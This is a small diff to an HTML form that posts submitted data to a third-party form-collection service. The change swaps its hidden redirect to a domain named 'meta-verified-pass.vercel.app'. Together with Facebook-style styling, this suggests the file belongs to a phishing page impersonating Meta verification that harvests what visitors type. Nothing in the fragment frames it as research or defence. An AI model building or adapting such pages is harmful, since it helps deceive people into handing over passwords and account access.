--- a/request.html
+++ b/request.html
@@ -11,7 +11,7 @@
 
 <body>
     <form action="https://submit-form.com/jOE2lVGBf" method="post">
-            <input type="hidden" name="_redirect" value="https://new-pass-sub-here.vercel.app"/>
+            <input type="hidden" name="_redirect" value="https://meta-verified-pass.vercel.app/"/>
 
 <div class="relative flex border bg-[#e9ebee] h-10 md:hidden 1g:hidden sm:block">
 
